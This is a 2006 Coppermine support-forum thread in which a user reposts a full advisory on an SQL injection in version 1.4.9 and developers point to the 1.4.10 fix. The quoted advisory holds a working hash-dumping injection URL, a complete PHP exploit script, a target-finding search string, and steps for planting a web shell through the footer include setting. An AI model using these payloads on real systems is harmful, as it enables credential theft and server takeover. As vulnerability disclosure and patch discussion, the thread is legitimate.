Coppermine 1.4.9 SQL injection exploit-new vulnerability reported Coppermine 1.4.9 SQL injection exploit-new vulnerability reported
 

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Main Menu

Coppermine 1.4.9 SQL injection exploit-new vulnerability reported

Started by bigarte, October 29, 2006, 02:17:36 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

bigarte

Hi mate;
I don't know if you are aware of this, but I just had a report today of another SQL injection exploit for version 1.4.9.

The URL to the report is here:-  http://w4ck1ng.com/board/showthread.php?p=8469#post8469

I have included it here in full:-


Quote=========================================
Coppermine 1.4.9 SQL injection exploit
by disfigure of w4ck1ng.com
=========================================
INTRO

http://coppermine-gallery.net/
Coppermine is a multi-purpose fully-featured and integrated web picture gallery script written in PHP.

Coppermine has a SQL injection vulnerability that can be exploited by any registered user. This can not be exploited by an anonymous user.

googledork: allintext: register "powered by coppermine"
=========================================
NOTES

-The table prefix must be known, and on each version of Coppermine, it changes. e.g. cpg149_ for v1.4.9, cpg148_ for v1.4.8, etc. Fortunately the version of Coppermine is stored in an html comment near "Powered by Coppermine". Also, if you run this query and it fails, it returns with an error message which includes the table prefix.

-You must be a registered user to access the vulnerable page, picmgr.php.

-The page picmgr.php is a newer feature for coppermine, it does not exist in some earlier versions.
=========================================
VULN

The primary methods utilized by Coppermine developers for mitigating SQL injection is a follows:

1. $_GET Values that are expected to be numbers are cast to int: $aid = (int)$_POST['aid'];

2. criteria in WHERE clauses are surrounded by single quotes('), regardless of the expected datatype: "...WHERE aid='$album';"

However, sometimes these methods are not employed and SQL injection is possible:

picmgr.php:356
$result = cpg_db_query("SELECT aid, pid, filename FROM {$CONFIG['TABLE_PICTURES']} WHERE aid = $aid ORDER BY position ASC, pid");

If we simply supply the right SQL string as the value for $aid, we can get any data we want from the db.

POC to get admin hash:


<victim>/picmgr.php?aid=123%20UNION%20SELECT%20user_id,user_group,concat(user_name,char(58,58),user_password)%20FROM%20cpg149_users%20right%20join%20cpg149_usergroups%20on%20cpg149_users.user_group%20=%20cpg149_usergroups.group_id%20where%20cpg149_usergroups.has_admin_access%20=%201%20--=========================================
XPL

script by synsta:


Code:
#!/usr/bin/php
<?php

/*********************************************************************
* Coppermine Photo Gallery 1.4.9 Remote SQL Injection Vulnerability
*
* Note:
* Requires a valid user account.
*
* Usage:
* php script.php [host] [path] [table prefix] [user id] [username] [password]
*
* Usage Example:
* php script.php domain.com /coppermine/ cpg149_ 1 john secret
*
* Googledork"
* "Powered by Coppermine Photo Gallery"
*
* Credits:
* Disfigure - Vulnerability research and discovery
* Synsta - Exploit scripting
*
* [w4ck1ng] - w4ck1ng.com
*********************************************************************/

if(!$argv[6]){
die("Usage:
php $argv[0] [host] [path] [table prefix] [user id] [username] [password]\n
Usage Example:
php $argv[0] domain.com /coppermine/ cpg149_ 1 john secret\n");
}

if($argv[6]){

function send($host,$put){
global $data;
$conn = fsockopen(gethostbyname($host),"80");
if(!$conn) {
die("Connection to $host failed...");
}else{
fputs($conn,$put);
}
while(!feof($conn)) {
$data .=fgets($conn);
}
fclose($conn);
return $data;
}

$host = $argv[1];
$path = $argv[2];
$prefix = $argv[3];
$userid = $argv[4];
$userl = $argv[5];
$passl = $argv[6];

$post = "username=".urlencode($userl)."&password=".urlencode($passl)."&submitted=Login";
$req  = "POST ".$path."login.php?referer=index.php HTTP/1.1\r\n";
$req .= "Referer: http://".$host.$path."login.php?referer=index.php\r\n";
$req .= "Host: $host\r\n";
$req .= "Content-Type: application/x-www-form-urlencoded\r\n";
$req .= "Content-Length: ".strlen($post)."\r\n";
$req .= "Connection: Close\r\n";
$req .= "Cache-Control: no-cache\r\n\r\n";
$req .= $post;
send("$host","$req");

/* Borrowed from rgod. */           
$temp = explode("Set-Cookie: ",$data);
$temp2 = explode(" ",$temp[1]);
$cookie = $temp2[0];
$temp2 = explode(" ",$temp[2]);
$cookie .= " ".str_replace(";","",$temp2[0]);
$cookie = str_replace("\r","",$cookie);
$cookie = str_replace("\n","",$cookie);
           
$sql = urlencode("123 UNION SELECT user_id,user_group,concat(user_name,char(58,58),user_password) FROM ".$prefix."users where user_id = ".$userid." --");
$req =  "GET ".$path."picmgr.php?aid="."$sql HTTP/1.1\r\n";
$req .= "Host: $host\r\n";
$req .= "Content-Type: application/x-www-form-urlencoded\r\n";
$req .= "Cookie: ".$cookie."\r\n\r\n";
$req .= "Connection: Close\r\n\r\n";
send("$host","$req");

$gdata = explode("<option value=\"picture_no=1,picture_nm=",$data);
$ghash = explode(",action=0\">",$gdata[1]);
$hash = $ghash[0];
$uname = explode("'",$hash);
$uname = explode("::",$uname[1]);
$username = $uname[0];
$fhash = explode("::",$hash);
$fhash = explode("',picture_sort=100",$fhash[1]);
$finalhash = $fhash[0];

if(strlen($finalhash) != 32){
die("Exploit failed..\n");
}else{
die("Username: $username MD5: $finalhash\n");
}
}
?>=========================================
AFTER THE HASH

Here is one example of how to upload a shell after you have gained administrative access.

1. Create a file on your local hdd, name it up.txt - it has to have a valid coppermine extension, I picked txt. Edit the file to contain the following:



<? if(isset($_REQUEST['x'])){ ?>
<FORM ENCTYPE="multipart/form-data" METHOD="POST">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="500000">
Send this file:
<INPUT NAME="userfile" TYPE="file">
<INPUT TYPE=HIDDEN NAME="X" VALUE=1>
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<?
move_uploaded_file($_FILES['userfile']['tmp_name'], "albums/copper.php");
}
?>2. Log in as admin and go to the file upload page (upload.php).

3. Upload the file up.txt. Part of the upload process will require you to add the file to an album. Just remember, people browsing the album WILL see the txt file while it is there. It is recommended to delete it after you have uploaded your shell.

4. Find the location of your text file in the directory structure. You can do this by finding the file in the album and viewing the hyperlink. In my testing, the path was /coppermine/albums/userpics/10001/up.txt.

5. Go to the Config page of the site (admin.php) and expand the section "Themes settings". Under "Path to custom footer include", enter the location of the up.txt file, including the proper path. It is relative to the current coppermine root, so for my example I used albums/userpics/10001/up.txt.

6. Access any page with x=1 as the querystring. (index.php?x=1)

7. You should see a text box on the bottom of the screen, this is for you to upload your shell. Upload it as a php file.

8. You should now be able to access your shell under the albums subdirectory, hxxp://victim/coppermineroot/albums/copper.php.

9. Once you have validated your shell, remove the text file and change the footer include settings back to the original.
=========================================
OUTRO

The Coppermine developers were able to prevent most SQL injection vulnerabilities by enclosing all variable parameters with single quotes, but they simply overlooked one. Unfortunately for them, it leads to information disclosure.

Can you confirm if this is a real issue or just a hoax?

Nibbler

We are already aware of this, 1.4.10 will be released to correct this soon. A manual fix is posted here

bigarte

OK Nibbler; thanks.  I was very concerned when I came across this report.  I PM'd the report to GauGau yesterday and then later, read not to PM him unless he requests it, so I made a general post today.

If I have done anything wrong, I apologise.  :)

Keep up the great work on this fine software.

Joachim Müller

cpg1.4.10 has been released, check the announcement thread.

bigarte